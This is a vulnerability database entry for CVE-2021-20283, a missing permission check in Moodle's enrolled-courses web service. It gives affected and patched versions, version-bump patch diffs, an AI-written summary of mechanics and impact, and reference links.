CVE-2021-20283
Description
Moodle's web service for fetching enrolled courses lacked permission checks, allowing unauthorized users to view course enrollments.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Moodle's web service for fetching enrolled courses lacked permission checks, allowing unauthorized users to view course enrollments.
Vulnerability
Overview The web service endpoint responsible for retrieving other users' enrolled courses in Moodle did not validate that the requesting user had the necessary permission to view that information within each course. This missing access control check affected Moodle versions prior to 3.10.2, 3.9.5, 3.8.8, and 3.5.17 [1][2].
Exploitation
An attacker could exploit this vulnerability by sending a crafted request to the web service, specifying a target user's ID. Since the service did not verify the requester's profile access rights per course, the attacker could obtain the list of courses in which the target user was enrolled, even if the attacker had no access to those courses [2].
Impact
The vulnerability allows an authenticated user to enumerate the course enrollments of other users, potentially revealing sensitive information about a user's learning activities and affiliations. This could be used for reconnaissance or to infer private details about individuals [1].
Mitigation
The issue has been fixed in Moodle versions 3.10.2, 3.9.5, 3.8.8, and 3.5.17. Users are advised to upgrade to these or later versions. No workarounds have been publicly documented [1][2].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
moodle/moodlePackagist | >= 3.10.0, < 3.10.2 | 3.10.2 |
moodle/moodlePackagist | >= 3.9.0, < 3.9.5 | 3.9.5 |
moodle/moodlePackagist | >= 3.8.0, < 3.8.8 | 3.8.8 |
moodle/moodlePackagist | < 3.5.17 | 3.5.17 |
Affected products
3- moodle/moodledescription
- osv-coords2 versions
>= 3.5.0, < 3.5.17+ 1 more
- (no CPE)range: >= 3.5.0, < 3.5.17
- (no CPE)range: >= 3.10.0, < 3.10.2
Patches
415f3dddd042aMoodle release 3.10.2
1 file changed · +2 −2
version.php+2 −2 modified@@ -29,9 +29,9 @@ defined('MOODLE_INTERNAL') || die(); -$version = 2020110901.10; // 20201109 = branching date YYYYMMDD - do not modify! +$version = 2020110902.00; // 20201109 = branching date YYYYMMDD - do not modify! // RR = release increments - 00 in DEV branches. // .XX = incremental changes. -$release = '3.10.1+ (Build: 20210305)';// Human-friendly version name +$release = '3.10.2 (Build: 20210308)';// Human-friendly version name $branch = '310'; // This version's branch. $maturity = MATURITY_STABLE; // This version's maturity level.
02a2e649e92dMoodle release 3.9.5
1 file changed · +2 −2
version.php+2 −2 modified@@ -29,9 +29,9 @@ defined('MOODLE_INTERNAL') || die(); -$version = 2020061504.09; // 20200615 = branching date YYYYMMDD - do not modify! +$version = 2020061505.00; // 20200615 = branching date YYYYMMDD - do not modify! // RR = release increments - 00 in DEV branches. // .XX = incremental changes. -$release = '3.9.4+ (Build: 20210305)'; // Human-friendly version name +$release = '3.9.5 (Build: 20210308)'; // Human-friendly version name $branch = '39'; // This version's branch. $maturity = MATURITY_STABLE; // This version's maturity level.
6f7e3ca2f7e8Moodle release 3.8.8
1 file changed · +2 −2
version.php+2 −2 modified@@ -29,9 +29,9 @@ defined('MOODLE_INTERNAL') || die(); -$version = 2019111807.01; // 20191118 = branching date YYYYMMDD - do not modify! +$version = 2019111808.00; // 20191118 = branching date YYYYMMDD - do not modify! // RR = release increments - 00 in DEV branches. // .XX = incremental changes. -$release = '3.8.7+ (Build: 20210305)'; // Human-friendly version name +$release = '3.8.8 (Build: 20210308)'; // Human-friendly version name $branch = '38'; // This version's branch. $maturity = MATURITY_STABLE; // This version's maturity level.
5a1b6a9d50f5Moodle release 3.5.17
1 file changed · +2 −2
version.php+2 −2 modified@@ -29,11 +29,11 @@ defined('MOODLE_INTERNAL') || die(); -$version = 2018051716.01; // 20180517 = branching date YYYYMMDD - do not modify! +$version = 2018051717.00; // 20180517 = branching date YYYYMMDD - do not modify! // RR = release increments - 00 in DEV branches. // .XX = incremental changes. -$release = '3.5.16+ (Build: 20210305)'; // Human-friendly version name +$release = '3.5.17 (Build: 20210308)'; // Human-friendly version name $branch = '35'; // This version's branch. $maturity = MATURITY_STABLE; // This version's maturity level.
Vulnerability mechanics
Root cause
"Missing authorization check in the web service that fetches other users' enrolled courses allows an authenticated user to view enrollment data without permission."
Attack vector
An attacker can invoke the web service that retrieves another user's enrolled courses without proper authorization checks [CWE-862]. The service fails to validate that the requesting user has permission to view course enrollment information for the target user in each course. This allows an authenticated attacker to enumerate the courses in which any other user is enrolled, bypassing the intended access controls [ref_id=1].
Affected code
The vulnerability exists in the web service responsible for fetching other users' enrolled courses. The advisory does not specify the exact file or function name, but the issue is in the authorization logic of that service endpoint [ref_id=1].
What the fix does
The supplied patches only bump version.php for each affected branch (3.10.2, 3.9.5, 3.8.8, 3.5.17) and do not contain the actual code fix [patch_id=2271473][patch_id=2271472][patch_id=2271471][patch_id=2271470]. The advisory references a Moodle forum discussion (https://moodle.org/mod/forum/discuss.php?d=419654) as the vendor advisory and patch source [ref_id=1]. The fix would require adding an authorization check to the web service handler to verify that the requesting user has permission to view the target user's course enrollment data for each course returned.
Preconditions
- authAttacker must be an authenticated Moodle user
- networkThe vulnerable web service endpoint must be accessible
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
8- github.com/advisories/GHSA-2m72-m5cw-3g9hghsaADVISORY
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/mitrevendor-advisoryx_refsource_FEDORA
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/mitrevendor-advisoryx_refsource_FEDORA
- nvd.nist.gov/vuln/detail/CVE-2021-20283ghsaADVISORY
- bugzilla.redhat.com/show_bug.cgighsax_refsource_MISCWEB
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MSghsaWEB
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMTghsaWEB
- moodle.org/mod/forum/discuss.phpghsax_refsource_MISCWEB
News mentions
0No linked articles in our index yet.